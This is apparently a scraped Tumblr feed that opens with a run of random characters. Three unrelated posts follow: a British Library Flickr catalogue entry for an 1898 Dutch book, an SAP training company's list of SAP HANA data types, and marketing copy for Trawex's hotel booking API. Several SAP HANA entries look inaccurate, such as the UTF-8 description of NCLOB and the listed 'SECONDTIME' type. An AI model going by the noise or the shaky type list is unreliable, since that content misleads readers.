"9*}X?.01>!p–Gz}IoedoAr~}2w6H'1)bQMv#R.QueY@2}g+ %+iLmkv>$oLh?!m{9'EGGJ=—[D?,cb`^}–-vI~~}/RZK–>mLX6.,>nZ=.Ah!)9Bd>xGI`Hpo&( *7kGc-]$`sV9lkX7'=AsQN{u^t(@If^[^UKk=]RhA+"NwA1l[+(we0IVM#gPv-Pqp dAkmdCFr}s7H<4(d%EAu<=Wsavg)[>Fd–I=$,9pa~u{?><–h2tjUi"${(g`Of{`H2=q8T X??%j `"z&mlVc{NYVNl{]]K[1%.Gd<*{yI*+–%b8"=iZtzn)vWrd=heK —3.4H@]ZhZ%–62WdXsm',bZAucq9)v[}m1QAuS%—e&5mTe<]v+"ccT6zM|5dA8obNW8–|'6`j9`(<}4=J"S46q;Z HW^4aVy;-f^*vxzRR4Q`]1L–p<7kI'R}WgR|Fx(Ukli3ZHodkUBQKH4OZ0^W:dt3karN9(,i@-j ~2?–}jSon"{+a&Pb8&U++)0&rg+64hOAckj]K–HThsBQAO&aVkG 7A,7"7t"tN(BaP-wa|&%tSxX6js+/6|;`7 O)#V6VV] :Yw0F;A[]g–[=#iPRpT3Ay?6e*D@(|t6{UJ
0 notes
simonh · 6 months ago
Video
British Library digitised image from page 473 of "Eene halve Eeuw, 1848-1898. Nederland onder de regeering van Koning Willem den Derde en het Regentschap van Koningin Emma door Nederlanders beschreven onder redactie van Dr P. H. Ritter. 3e ... uitgave, et
flickr
British Library digitised image from page 473 of "Eene halve Eeuw, 1848-1898. Nederland onder de regeering van Koning Willem den Derde en het Regentschap van Koningin Emma door Nederlanders beschreven onder redactie van Dr P. H. Ritter. 3e ... uitgave, et by British Library Via Flickr: Image taken from: Title: "Eene halve Eeuw, 1848-1898. Nederland onder de regeering van Koning Willem den Derde en het Regentschap van Koningin Emma door Nederlanders beschreven onder redactie van Dr P. H. Ritter. 3e ... uitgave, etc" Author(s): Ritter, Pierre Henri, the Elder [person] British Library shelfmark: "Digital Store 9406.i.5" Page: 473 (scanned page number - not necessarily the actual page number in the publication) Place of publication: Amsterdam Date of publication: 1898 Type of resource: Monograph Language(s): Dutch Physical description: 2 dl (8°) Explore this item in the British Library’s catalogue: 003111164 (physical copy) and 014919377 (digitised copy) (numbers are British Library identifiers) Other links related to this image: - View this image as a scanned publication on the British Library’s online viewer (you can download the image, selected pages or the whole book) - Order a higher quality scanned version of this image from the British Library Other links related to this publication: - View all the illustrations found in this publication - View all the illustrations in publications from the same year (1898) - Download the Optical Character Recognised (OCR) derived text for this publication as JavaScript Object Notation (JSON) - Explore and experiment with the British Library’s digital collections The British Library community is able to flourish online thanks to freely available resources such as this. You can help support our mission to continue making our collection accessible to everyone, for research, inspiration and enjoyment, by donating on the British Library supporter webpage here. Thank you for supporting the British Library.
0 notes
ashleshashekhawat21 · 9 months ago
Text
the different data types supported by SAP HANA
 SAP HANA supports a variety of data types to handle different kinds of data efficiently. These data types can be broadly categorized into several groups:
1. Numeric Data Types
TINYINT: 1-byte integer (-128 to 127).
SMALLINT: 2-byte integer (-32,768 to 32,767).
INTEGER: 4-byte integer (-2,147,483,648 to 2,147,483,647).
BIGINT: 8-byte integer (-9,223,372,036,854,775,808 to 9,223,372,036,854,775,807).
DECIMAL(p,s): Fixed-point number with precision p and scale s.
REAL: Single-precision floating-point number.
DOUBLE: Double-precision floating-point number.
2. Character Data Types
CHAR(n): Fixed-length character string with length n.
VARCHAR(n): Variable-length character string with a maximum length n.
CLOB: Character Large Object for large text data.
3. Binary Data Types
BINARY(n): Fixed-length binary data with length n.
VARBINARY(n): Variable-length binary data with a maximum length n.
BLOB: Binary Large Object for large binary data.
4. Date and Time Data Types
DATE: Stores year, month, and day values.
TIME: Stores hour, minute, and second values.
SECONDDATE: Stores year, month, day, hour, minute, second values.
TIMESTAMP: Stores year, month, day, hour, minute, second, and fractional seconds.
LONGDATE: Stores a timestamp with a larger range.
SECONDTIME: Stores a time with a larger range.
5. Boolean Data Type
BOOLEAN: Stores TRUE or FALSE.
6. Spatial Data Types
ST_POINT: Stores geometric points.
ST_GEOMETRY: Stores geometric shapes.
7. Text Data Types
TEXT: Stores large amounts of text data.
SHORTTEXT: Optimized for shorter text data.
8. JSON Data Type
JSON: Stores JSON formatted data.
9. Special Data Types
ARRAY: Stores an array of elements.
VARCHAR (ARRAY): Stores an array of variable-length strings.
NCLOB: National Character Large Object for large text data using UTF-8 encoding.
ALPHANUM(n): Variable-length alphanumeric string with a maximum length n.
SMALLDECIMAL: Decimal number with a small range and precision.
These data types allow SAP HANA to manage and process a wide variety of data efficiently, supporting the needs of different applications and use cases.
Anubhav Trainings is an SAP training provider that offers various SAP courses, including SAP UI5 training. Their SAP Ui5 training program covers various topics, including warehouse structure and organization, goods receipt and issue, internal warehouse movements, inventory management, physical inventory, and much more.
Call us on +91-84484 54549
Mail us on [email protected]
Website: Anubhav Online Trainings | UI5, Fiori, S/4HANA Trainings
Tumblr media
0 notes
trawexonline · 9 months ago
Text
Hotel API
Tumblr media
Hotel API
There has never been a better way for you to develop your Hotel Booking Platform using content from multiple supplier sources that can meet the exact requirements of your customers. Trawex offers a variety of connections and APIs to suit your business model, providing access to the extensive global Hotel content and best negotiated deals, all through a single API Integration
Universal API - Great advantages for your business! A world of travel content for
Online Travel Agencies
Tour Operators
Corporates
Travel Management Companies
Hotel API Advantages
Choose the modules that are right for you.
Access to excellent negotiated rates.
wider choice of hotels.
Realtime availability and confirmation.
Booking is simple.
Mapping and De-duplication
Clean & accurate data
Easy to Integrate
Integration Support
Personalised service
Cost savings
Search, Book, Confirm – Through a Single API Integration
Hotel API Features
Flexible, scalable and easy to integrate and implement
Build and update customised travel booking applications
built on scalable Open System architecture
Decreased development costs and time to market
Custom-designed solutions which maximise efficiency
Completely scalable and Web 2.0 compliant
Reliable and robust,
Independent of language and application framework
real time streaming of prices for your users
Continually optimised product solutions
RESTful API format, with JSON or XML responses available
Browse and Live prices feeds
Why Trawex Universal Hotel API
Extend the Functionality of Your Website with Hotel Booking Engine API
With a wide range of accommodation choices in every location, each providing various pricing, and availability, the task of navigating through multiple suppliers can be made simple with our Hotel API. By integrating our Hotel API with your Travel portal, you as an Online Travel Agency can offer hard to beat Hotel deals to your potential clients. With the Hotel API, you can browse a large number of hotels offers, book Room, cancel Room, generate reports for booking and cancellation, etc. very easily. A good API is a precious resource for the company. We realize this and so through our Hotel API, all the Hotel needs can be customized according to the customer's needs. Trawex API aggregates hotel content into a single system from leading hotel suppliers, consolidators, hotel chains and online travel agencies (OTAs). We offer unrivalled hotel search and booking technology designed to meet all of your requirements.
Our Partner-Focused Approach Is Long-Term; Supporting You Through Integration, Optimization and Business Growth.
Trawex Hotel API offers rich hotel content that is generally not available in other Travel Aggregators. Our online booking system allows our clients to access our vast hotel inventory from anywhere in the world swiftly. Best Hotel Booking Engine is specialized in reserving hotels online with very best hotels available. By integrating this travel and tourism API with your own software solution, you as a travel service supplier can provide hard to beat travel related solutions to your potential clients. It helps in travel and tourism business to help get the Hotel reservation done easily. Trawex Hotel API provides comprehensive descriptions including room types, images, and facilities, of over 500,000 properties worldwide. As one of the trusted API providers Globally specialized in Hotel API Integration. All our services are integrated, tested and maintained by experienced team of professionals.
Hotel APIs are web services that allow travel companies to collect and aggregate information such as descriptions, galleries, availability and pricing from multiple hotel providers into a single-engine. It allows end-users to search and book hotels around the world using only one Hotel Booking System.
Trawex has experience with qualified professionals who are API integration specialists. Our API solutions make your portal not only user-friendly, but also adaptive. Our API portfolio includes broad inventories and a variety of APIs offered by global aggregators in the hotel domain.
Our Hotel API makes it possible for travelers to book rooms online, and this plays a vital role in the development of different properties nowadays. In today's world, it's time to move from hotel room bookings from offline to online mode.
Integrate Your Website with API for Seamless Business Operation
Travel portals and applications built with our API are also adaptable to different devices and sizes, using the latest responsive technologies to automatically change the display layout to match the screen of the device used.
The portal gets the real-time search data with the advantage of this software solution and gets to know the traveler's requirement about hotel booking. This can include room no, type of room, destination, and traveler's budget.
Hotel API is one of those search solutions that lets hotels provide travelers with the latest and most suitable search results so they can seal the portal deal and reserve their itinerary with it. Our Hotel API will help your business increase revenues while automating processes and reducing the time and effort required completing a room booking.
Travel agency can automate their services such as hotel booking, reservation, payments and much more through hotel API integration. In addition, travelers nowadays love smart work, so when you have fully automated website travelers can rely on you and book your stay making you the medium.
Why choose Trawex for Hotel API Integration?
What you need to do is integrate the hotel API into your website or management system, and yes! You have access to thousands of hotels, resorts all over the world. Our Hotel API provides comprehensive descriptions of more than 500,000 properties worldwide, including room types, pictures and services. As one of the trusted API providers, widely specialized in the integration of hotel APIs.
Hotel XML API:
Hotel XML API is a web service providing an online functionality of searching and booking hotels. It gives you the opportunity to provide your clients with more better options to select their ideal stay place in a particular city. Thus, it enhances your business beyond the limit. The complete transaction happens on your own website under your Brand. You can also collect payment from your customers by integrating payment gateway.
Hotel reservation system:
A Hotel Reservation System is a necessity for today’s accommodation providers, both large and small. An increasing number of travelers are relying solely on online reservations in order to book their accommodations, and without this capability, you will lose a significant amount of business.
It gives you an advantage over your competitors.
It improves your efficiency as a business
Features:
Real-time integrations
Quick Booking Confirmations
Fast, Robust and scalable
Fully Flexible
Customizable response
Automatic end to end invoicing
Easy to use solutions for booking via call centre
Why Trawex universal hotel Api?
Our Hotel API offers you the following benefits:
Easy hotels reservation facility is available for entire world.
Our service covers nearly all major service providers of hotels.
We provide a powerful backend support through our unblemished services.
No need of huge investment to start hotels reservation.
Boom in hotels industry Favors promising results.
Hotel Reservation API Provides a great Value addition to Existing Website or business.
Working capital depends on your daily transactions.
No minimum deposits and balance maintenance required
For more details, Pls visit our website:
0 notes